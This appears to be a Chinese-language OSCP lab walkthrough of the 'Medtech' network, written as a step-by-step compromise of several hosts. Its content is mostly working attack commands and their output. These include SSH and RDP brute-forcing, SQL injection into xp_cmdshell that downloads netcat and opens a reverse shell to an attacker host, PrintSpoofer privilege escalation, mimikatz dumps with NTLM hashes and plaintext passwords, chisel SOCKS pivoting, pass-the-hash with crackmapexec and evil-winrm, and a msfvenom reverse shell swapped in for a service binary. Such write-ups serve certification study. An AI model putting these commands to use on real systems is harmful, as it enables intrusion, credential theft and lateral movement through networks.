OSCP-Medtech
192.168.218.120 (WEB01)
NMAP
1
2
3PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack利用取得的憑證ssh
1
存在sudo 直接最高權限
FLAG
1 |
|
192.168.218.122 (vpn)
NMAP
1
2PORT STATE SERVICE REASON
22/tcp open ssh syn-ackhydra 爆破
1
2
3proxychains4 -q hydra -L user -P /usr/share/wordlists/fasttrack.txt 192.168.218.122 ssh -F -V
[22][ssh] host: 192.168.218.122 login: offsec password: password提權
1
2
3
4
5
6
7連線發現在受限shell
搜索history找到以下指令
sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
執行後提權
FLAG
1 |
|
- 在/home/mario/.ssh 找到id_rsa
1
2可連線到172.16.218.14
proxychains4 -q ssh -i id_rsa mario@172.16.218.14
172.16.218.14 (NTP)
192.168.215.121
NMAP
1
2
3
4
5
6
7
8Host is up, received user-set (0.27s latency).
Scanned at 2023-09-19 22:15:26 CST for 34s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ackLogin.aspx 存在sqlinjection
1
2
3
4
5
6
7
8
9
10
11
12
13admin' WAITFOR DELAY '0:0:10'--
admin' if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5'--
# 存在dba
'; if (SELECT IS_SRVROLEMEMBER('sysadmin'))>0 WAITFOR DELAY '0:0:5'--
# 存在xp_cmdshell
'; if (SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype='x' AND name='xp_cmdshell')>0 WAITFOR DELAY '0:0:5'--
'; EXEC xp_cmdshell 'certutil -urlcache -split -f http://192.168.45.246:443/nc64.exe c:\\users\\public\\nc64.exe'--
'; EXEC xp_cmdshell 'c:\\users\\public\\nc64.exe -e cmd.exe 192.168.45.246 80'--whoami /priv 存在模擬權限
1
2
3
4
5
6
7
8
9Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled上傳 PrintSpoofer 並執行
1
PrintSpoofer64.exe -i -c cmd.exe
mimikatz
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1072612 (00000000:00105de4)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 9/19/2023 5:11:30 PM
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 718019 (00000000:000af4c3)
Session : Service from 0
User Name : MSSQL$MICROSOFT##WID
Domain : NT SERVICE
Logon Server : (null)
Logon Time : 7/11/2023 5:00:17 AM
SID : S-1-5-80-1184457765-4068085190-3456807688-2200952327-3769537534
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 322809 (00000000:0004ecf9)
Session : Service from 0
User Name : joe
Domain : MEDTECH
Logon Server : DC01
Logon Time : 7/11/2023 4:58:16 AM
SID : S-1-5-21-976142013-3766213998-138799841-1106
msv :
[00000003] Primary
* Username : joe
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : 58de53296298ce0f98087ae902c88735
tspkg :
wdigest :
* Username : joe
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : joe
* Domain : MEDTECH.COM
* Password : Flowers1
ssp :
credman :
cloudap :
Authentication Id : 0 ; 127720 (00000000:0001f2e8)
Session : Service from 0
User Name : MSSQL$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 7/11/2023 4:58:04 AM
SID : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 78617 (00000000:00013319)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB02$
Domain : MEDTECH
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : web02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 47681 (00000000:0000ba41)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 366858 (00000000:0005990a)
Session : Interactive from 1
User Name : joe
Domain : MEDTECH
Logon Server : DC01
Logon Time : 7/11/2023 4:58:18 AM
SID : S-1-5-21-976142013-3766213998-138799841-1106
msv :
[00000003] Primary
* Username : joe
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : 58de53296298ce0f98087ae902c88735
tspkg :
wdigest :
* Username : joe
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : joe
* Domain : MEDTECH.COM
* Password : Flowers1
ssp :
credman :
cloudap :
Authentication Id : 0 ; 322808 (00000000:0004ecf8)
Session : Service from 0
User Name : joe
Domain : MEDTECH
Logon Server : DC01
Logon Time : 7/11/2023 4:58:16 AM
SID : S-1-5-21-976142013-3766213998-138799841-1106
msv :
[00000003] Primary
* Username : joe
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : 58de53296298ce0f98087ae902c88735
tspkg :
wdigest :
* Username : joe
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : joe
* Domain : MEDTECH.COM
* Password : Flowers1
ssp :
credman :
cloudap :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 7/11/2023 4:58:04 AM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 130227 (00000000:0001fcb3)
Session : Service from 0
User Name : SQLTELEMETRY$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 7/11/2023 4:58:04 AM
SID : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 7/11/2023 4:58:04 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 78636 (00000000:0001332c)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 47666 (00000000:0000ba32)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : WEB02$
* Domain : medtech.com
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :
Authentication Id : 0 ; 46439 (00000000:0000b567)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID :
msv :
[00000003] Primary
* Username : WEB02$
* Domain : MEDTECH
* NTLM : b6191454048eb6ea7bb3058ed8c088f2
* SHA1 : b6813ae6c2316b049456dc02ce0122bd62438a5c
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB02$
Domain : MEDTECH
Logon Server : (null)
Logon Time : 7/11/2023 4:58:03 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEB02$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : web02$
* Domain : MEDTECH.COM
* Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16
ssp :
credman :
cloudap :web.config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31type web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<!-- <customErrors mode="On">
<error statusCode="500" redirect="error.aspx"/>
<error statusCode="404" redirect="error.aspx"/>
</customErrors> -->
<customErrors mode="RemoteOnly" />
<compilation debug="true" targetFramework="4.0">
<assemblies>
<add assembly="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.DirectoryServices.AccountManagement, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
<add assembly="System.DirectoryServices.Protocols, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
</assemblies>
</compilation>
</system.web>
<system.webServer>
<defaultDocument>
<files>
<clear />
<add value="index.html" />
<add value="index.htm" />
<add value="default.aspx" />
</files>
</defaultDocument>
</system.webServer>
<connectionStrings>
<add name="myConnectionString" connectionString="server=localhost\SQLEXPRESS;database=webapp;uid=sa;password=WhileChirpTuesday218;Trusted_Connection=False;MultipleActiveResultSets=true; Integrated Security=False; Max Pool Size=500;" />
</connectionStrings>
</configuration>Ping掃出內網
1
for /L %i in (1,1,255) do @ping -w 1 -n 1 172.16.197.%i |findstr "TTL"
1 |
|
./172.txt
1
2
3
4
5
6
7
8
9
10172.16.197.10
172.16.197.11
172.16.197.12
172.16.197.13
172.16.197.14
172.16.197.82
172.16.197.83
172.16.197.120
172.16.197.122
172.16.197.254Chisel 設置 Socks Proxy
1
2
3
4
5首先在Kali攻擊機監聽chisel server
./chisel_1.8.1_linux_amd64 server -p 8090 --reverse
將chisel.exe 上傳到受害端,並且執行chisel client
chisel.exe client 192.168.45.246:8090 R:socks設置/etc/proxychains4.conf
1
2
3
4
5[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080crackmapexec
1
proxychains4 -q crackmapexec smb ./172.txt -u 'joe' -p 'Flowers1'
psexec to 172.16.197.11
1
proxychains4 -q python3 psexec.py joe:'Flowers1'@172.16.197.11
FLAG
1 |
|
172.16.197.11 (FILES02)
FLAG
1 |
|
- 在c:/Users/joe/Documents 找到 fileMonitorBackup.log
1
cat fileMonitorBackup.log |grep "Backup"
1 |
|
建立user 以及 hash的 wordlists,然後用crackmapexec爆破
1
2proxychains4 -q crackmapexec smb ./172 -u ./user -H ./hash
proxychains4 -q crackmapexec winrm ./172 -u ./user -H ./hash也把hash爆破成pass,並建立完整的字典檔
user
1
2
3
4
5
6
7
8
9
10
11
12daisy
toad
wario
goomba
Administrator
joe
leon
mario
offsec
peach
wario
yoshipass
1
2
3toadstoolpassword
Mushroom!
squishhophash
1
2
3
4abf36048c1cf88f5603381c5128feb8e
5be63a865b65349851c1f11a067a3068
fdf36048c1cf88f5630381c5e38feb8e
8e9e1516818ce4e54247e71e71b5f436evil-winrm
1
proxychains4 -q evil-winrm -i 172.16.197.83 -u 'wario' -H 'fdf36048c1cf88f5630381c5e38feb8e'
172.16.197.83 (CLIENT02)
上傳winpeas
1
winPEASx64.exe quiet cmd fast > c:\Users\wario\DEsktop\result.txt
找到auditTracker.exe 權限可寫入
1
2
3
4auditTracker(auditTracker)[C:\DevelopmentExecutables\auditTracker.exe] - Autoload - isDotNet
File Permissions: Everyone [AllAccess], Authenticated Users [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\DevelopmentExecutables (Everyone [AllAccess], Authenticated Users [WriteData/CreateFiles])
Tracks the security event log for audit eventssc qc auditTracker
1
2
3
4
5
6
7
8
9
10
11
12[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: auditTracker
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\DevelopmentExecutables\auditTracker.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : auditTracker
DEPENDENCIES :
SERVICE_START_NAME : LocalSystemmsfvenom 構造shell 並替換原本的exe
1
2
3
4
5msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.45.172 lport=443 -f exe > auditTracker.exe
copy \\192.168.45.172\giwawa\auditTracker.exe C:\DevelopmentExecutables\
sc start auditTracker
FLAG
1 |
|
172.16.218.12 (DEV04)
透過hydra測到可rdp
1
2
3proxychains4 -q hydra -L user -P pass -M result.txt rdp -V
[3389][rdp] host: 172.16.218.12 login: yoshi password: Mushroom!rdp連線
1
proxychains4 -q xfreerdp /v:172.16.218.12 /u:'yoshi' /p:'Mushroom!' /size:'80%'
在c:/temp找到backup.exe
1
把他替換成我產的shell.exe,他就回連了
FLAG
1 |
|
Mimikatz
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
